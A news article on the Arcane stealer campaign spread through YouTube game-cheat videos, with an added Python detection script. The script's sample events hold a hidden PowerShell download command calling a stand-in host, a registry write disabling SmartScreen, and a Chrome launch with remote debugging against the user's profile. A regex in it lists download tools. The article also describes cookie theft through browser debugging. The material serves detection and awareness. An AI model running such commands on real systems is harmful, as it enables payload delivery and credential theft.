
YouTube Game Cheats Videos Spread New Arcane Stealer Malware


Cybercriminals are exploiting YouTube videos promoting game cheats to spread a new, powerful stealer malware known as Arcane, targeting mostly Russian-speaking users. According to cybersecurity firm Kaspersky, the malware campaign has quietly gained momentum, collecting vast amounts of sensitive data from unsuspecting victims.

What makes Arcane particularly dangerous is its ability to gather extensive personal and system information, including data from VPN services, gaming platforms, messaging apps, and even crypto wallets. Kaspersky researchers say the malware is designed to steal everything from login credentials and credit card details to Wi-Fi passwords and system configurations.

How the Attack Works: From YouTube to Full System Breach

The operation begins with YouTube videos advertising game hacks or cheat downloads. Links attached to these videos lead to a password-protected archive. The archive itself does nothing; the victim has to unpack it and run the bundled start.bat, and that script uses PowerShell to download a second password-protected archive.

Inside that second package are two executables: one is a cryptocurrency miner, the other the VGS stealer, a variant of the Phemedrone malware family. Since late 2024, however, the operators have replaced VGS with their own custom stealer, Arcane.

The batch file also switches off Windows SmartScreen, the reputation check that would otherwise warn before an unrecognised download runs. With it disabled, the dropped executables start without that prompt, and any payloads fetched later in the same session are waved through as well.

Kaspersky’s analysis reveals Arcane is no ordinary stealer. It digs deep into the victim’s system, pulling data from a wide range of applications, including:

  • VPN clients: NordVPN, ExpressVPN, Mullvad, Proton, IPVanish, CyberGhost, and more
  • Network tools: ngrok, Playit, Cyberduck, FileZilla, DynDNS
  • Messaging apps: Discord, Telegram, Skype, ICQ, Signal, Viber, and others
  • Email clients: Microsoft Outlook
  • Gaming platforms: Steam, Epic Games, Riot Client, Battle.net, Ubisoft Connect, Roblox, and Minecraft clients
  • Crypto wallets: Electrum, Exodus, Jaxx, Atomic, Guarda, Coinomi, Zcash, and Ethereum wallets

Arcane doesn’t stop there. It captures screenshots, lists running processes, and extracts saved Wi-Fi credentials, providing attackers with a detailed blueprint of the infected machine.

One of Arcane's most concerning capabilities is how it gets at sensitive browser data. Most modern browsers encrypt saved passwords and cookies with a key that, on Windows, is itself protected by the Data Protection API (DPAPI). Because the stealer runs inside the victim's own session, it can simply ask DPAPI to unwrap that key, a tactic common to almost every data stealer.

The malware takes it a step further, though. It drops and silently runs a tool called Xaitax, which recovers browser encryption keys; Arcane reads the keys from the tool's output and uses them to decrypt login data, stored cookies, and session tokens.

Arcane also has a second route to cookies: it launches a copy of a Chromium-based browser with a remote-debugging port enabled, connects to that debugging interface, and pulls the cookies straight from the running browser, so they never have to be decrypted from disk at all. This method is rarely seen in stealer campaigns.
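The delivery chain and the browser-debugging trick described above each leave a recognisable trace in endpoint telemetry. The following Python hunting rules are an added example, not Kaspersky's analysis code or anything published with the article: they run over a handful of constructed Sysmon-style events (the event shape, the sample paths, the host name example.invalid and the registry values are all assumptions for the example) and flag a batch-launched PowerShell downloader, a registry write that turns SmartScreen off, and a Chromium browser started with a remote-debugging port by something that is not a browser.

```python
"""Hunting rules for the Arcane delivery chain: added example, not the
article's or Kaspersky's code. Runs over constructed Sysmon-style events
and flags (1) cmd.exe (the launcher of start.bat) spawning PowerShell with
a download primitive, (2) a registry write that disables SmartScreen, and
(3) a Chromium-based browser started with a DevTools debugging port by a
non-browser parent.
"""
import ntpath
import re

# Event shapes mirror Sysmon Event ID 1 (process create: image, parent,
# cmdline) and Event ID 13 (registry value set: image, target, details).
# Every value below is constructed for the example, not real telemetry.
SAMPLE_EVENTS = [
    {"id": 1, "image": r"C:\Windows\System32\cmd.exe",
     "parent": r"C:\Windows\explorer.exe",
     "cmdline": r'cmd.exe /c "C:\Users\victim\Downloads\cheat\start.bat"'},
    {"id": 1, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent": r"C:\Windows\System32\cmd.exe",
     "cmdline": 'powershell -w hidden -c "Invoke-WebRequest '
                'http://example.invalid/p2.rar -OutFile p2.rar"'},
    {"id": 13, "image": r"C:\Windows\System32\reg.exe",
     "target": r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\SmartScreenEnabled",
     "details": "Off"},
    {"id": 1, "image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "parent": r"C:\Users\victim\AppData\Local\Temp\cheat.exe",
     "cmdline": r'chrome.exe --remote-debugging-port=9222 --headless '
                r'--user-data-dir="C:\Users\victim\AppData\Local\Google\Chrome\User Data"'},
    # Benign: the user opens Chrome from the desktop.
    {"id": 1, "image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "parent": r"C:\Windows\explorer.exe",
     "cmdline": r'"C:\Program Files\Google\Chrome\Application\chrome.exe"'},
]

DOWNLOAD_RE = re.compile(
    r"Invoke-WebRequest|\biwr\b|Invoke-RestMethod|DownloadFile|DownloadString|"
    r"Net\.WebClient|Start-BitsTransfer|\bcurl\b|\bwget\b", re.IGNORECASE)
POWERSHELL = {"powershell.exe", "pwsh.exe"}
CHROMIUM = {"chrome.exe", "msedge.exe", "brave.exe", "opera.exe",
            "vivaldi.exe", "chromium.exe"}
# Well-known registry settings that turn SmartScreen off, assumed here as
# indicators; the article does not say which key Arcane's batch file edits.
SMARTSCREEN_OFF = {
    r"\microsoft\windows\currentversion\explorer\smartscreenenabled": {"off"},
    r"\policies\microsoft\windows\system\enablesmartscreen": {"0", "dword (0x00000000)"},
}


def _base(path):
    return ntpath.basename(path).lower()


def rule_batch_to_powershell_download(ev):
    """PowerShell spawned by cmd.exe whose command line carries a download primitive."""
    if ev.get("id") != 1 or _base(ev["image"]) not in POWERSHELL:
        return None
    if _base(ev["parent"]) != "cmd.exe":
        return None
    m = DOWNLOAD_RE.search(ev["cmdline"])
    return f"download primitive '{m.group(0)}' in: {ev['cmdline']}" if m else None


def rule_smartscreen_disabled(ev):
    """Registry value set that switches SmartScreen off."""
    if ev.get("id") != 13:
        return None
    target = ev["target"].lower()
    details = ev["details"].strip().lower()
    for suffix, off_values in SMARTSCREEN_OFF.items():
        if target.endswith(suffix) and details in off_values:
            return f"{ev['target']} set to {ev['details']!r} by {_base(ev['image'])}"
    return None


def rule_browser_remote_debugging(ev):
    """Chromium started with a DevTools debugging port by a non-browser parent.
    Browser child processes carry --type=..., so they are excluded."""
    if ev.get("id") != 1 or _base(ev["image"]) not in CHROMIUM:
        return None
    cmd = ev["cmdline"]
    if "--remote-debugging-port" not in cmd and "--remote-debugging-pipe" not in cmd:
        return None
    if "--type=" in cmd or _base(ev["parent"]) in CHROMIUM:
        return None
    return f"{_base(ev['image'])} with debugging enabled, parent {ev['parent']}"


RULES = (rule_batch_to_powershell_download, rule_smartscreen_disabled,
         rule_browser_remote_debugging)


def hunt(events):
    """Return (rule_name, evidence) for every event that a rule matches."""
    findings = []
    for ev in events:
        for rule in RULES:
            evidence = rule(ev)
            if evidence:
                findings.append((rule.__name__[len("rule_"):], evidence))
    return findings


if __name__ == "__main__":
    for name, evidence in hunt(SAMPLE_EVENTS):
        print(f"[{name}] {evidence}")
```

The PowerShell rule keys on the cmd.exe parent rather than on the .bat name because the batch file's path is only visible on the parent's own command line; in a real pipeline the two events would be joined on process GUID. The debugging rule deliberately does not suppress explorer.exe parents: a developer may start a browser with a debugging port by hand, but a stealer launching it from a Temp directory with the real profile's user-data-dir is the case the article describes, and the parent path in the evidence string is what separates the two.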

Kaspersky warns that the group behind Arcane has expanded the operation with a companion tool, ArcanaLoader. Marketed as a simple downloader for game cheats, the loader instead installs the Arcane stealer on the victim's machine.

The campaign is primarily targeting users in Russia, Belarus, and Kazakhstan, reflecting a broader trend of cybercriminals tailoring attacks by region and language.

What stands out in this campaign, Kaspersky says, is the attackers’ ability to adapt and expand their methods. From gaming platforms to VPNs and crypto wallets, Arcane’s reach is vast — gathering anything attackers might find valuable.

“This campaign shows how flexible cybercriminals have become — constantly evolving their tools and attack strategies,” Kaspersky noted. “Arcane is particularly dangerous because of the sheer volume of sensitive information it can steal, and the sophisticated tricks it uses to get past defenses.”

For now, the best defense for users, especially those seeking game cheats online, is to avoid unverified downloads and stay vigilant: a password-protected archive that asks you to run a batch file is a warning sign, not a convenience. The lure of free cheats could cost much more than expected.
